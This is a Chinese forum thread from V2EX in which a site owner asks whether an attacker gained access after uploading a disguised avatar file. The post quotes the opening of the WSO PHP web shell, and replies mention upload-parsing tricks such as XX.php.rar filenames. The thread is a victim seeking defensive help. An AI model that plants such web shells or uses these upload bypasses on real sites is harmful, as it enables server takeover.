小站被挂马了。。。

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

推荐书目

高性能网站建设进阶指南

High Performance Web Sites

Google Hacks: Tips & Tools for Finding and Using the World's Information

关于 Google SEO 最好的一本书

这是一个创建于 4664 天前的主题，其中的信息可能已经有所发展或是发生改变。

一个小论坛，用的是thinksaas，对方注册账号，上传头像（伪装木马），直接打头像网址显示部分代码如下：

<?php # Web Shell by oRb
$auth_pass = md5("123456");
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}

@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.4');

....................

请问怎样判断对方是否拿到了权限呢？

set

INI

default

10 条回复 1970-01-01 08:00:00 +08:00

jimmy2010

2013-03-11 18:15:11 +08:00

这样的木马是不起作用的吧，代码都没运行

GASALA

2013-03-11 18:21:32 +08:00

@jimmy2010 打开那个人注册的页面杀软会弹出提示。。。

我只贴出了一部分代码。。。你的意思是他这个马没有执行吗？

icevil

2013-03-11 18:39:46 +08:00

@GASALA 杀软是特征码识别，所以会弹出提示。
除非你设置了.jpg等图片后缀解析为php，否则这样的静态文件是不会执行的吧。

GASALA

2013-03-11 18:45:43 +08:00

@icevil 谢谢。这方面白痴。

如果不能执行，那对方上传这段代码的意图是什么呢？

icevil

2013-03-11 19:28:29 +08:00

@GASALA 估计测试漏洞什么的吧，具体还要上传的人来回答。。
你后台查询上传这头像的账号的ip然后block啊~

jybox

2013-03-11 19:37:24 +08:00

这个黑阔很可能已经得手了，现在他可以远程执行命令，至于是root权限还是www-data的权限，要看你的服务器的权限配置.

他很可能在不止一个文件中挂了后门.

GASALA

2013-03-11 19:47:56 +08:00

@jybox 对比之后没发现有系统文件被修改过。。。我已经删除了那个伪装的文件。

请问怎样知道有没有登入过root或者怎么知道对方是否拥有了权限？

jimmy2010

2013-03-11 22:00:47 +08:00

@jybox
@GASALA
不用惊慌，jpg格式的文件在可解析php的服务器上是不会被解析的。对方在测试能否上传木马而已，除非将木马以.php格式上传，才有可能执行。或者利用php的解析漏洞，上传成XX.php.rar之类的，也可以执行。总之，纯图片不用担心，不管图片的内容是什么，只要确保.jpg这个后缀无法修改就行

1314258

2013-03-11 22:35:38 +08:00 via iPhone

别以为jpg不会执行。

notsobad

2013-03-12 00:34:36 +08:00

http://www.80sec.com/nginx-securit.html